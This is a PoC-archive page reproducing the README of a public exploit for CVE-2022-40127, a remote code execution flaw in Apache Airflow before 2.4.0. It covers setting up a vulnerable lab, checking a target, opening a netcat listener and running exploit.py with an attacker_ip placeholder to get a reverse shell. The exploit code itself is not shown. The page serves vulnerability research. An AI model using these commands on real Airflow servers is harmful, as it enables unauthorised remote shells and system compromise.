Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-40127 PoC — Apache Airflow <2.4.0 has an RCE in a bash example

Source
https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE
Associated Vulnerability
Title:Apache Airflow <2.4.0 has an RCE in a bash example (CVE-2022-40127)
Description:A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
Description
CVE-2022-40127 PoC and exploit
Readme
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)

**PoC for CVE-2022-40127 that is an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**

The <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127" target="_blank">official report description</a> says:

> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. 

The repo is created for a CVE analysis blog post available on <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.

https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6

## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```

## Install and run Airflow v2.3.4

### Via docker-compose
Download the docker-compose file from the official repo
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and password will be `airflow`.

### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```
You can verify if the installation was successful with commands `which airflow` and/or `airflow info`.

Run Airflow
```bash
airflow standalone
```
See the generated password and username in the logs.


## Using the exploit

First, install the required packeges with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
You can check if the host can be exploited or not:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```

Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```

Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">
File Snapshot

 [4.0K]  /data/pocs/d6ab31e156c6b3ae34db80606a6d58385b5a184d
├── [6.0K]  exploit.py
├── [4.0K]  proofs
│   ├── [234K]  flowchart.png
│   ├── [6.0M]  proof.mp4
│   └── [380K]  proof.png
├── [2.6K]  README.md
└── [  27]  requirements.txt

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →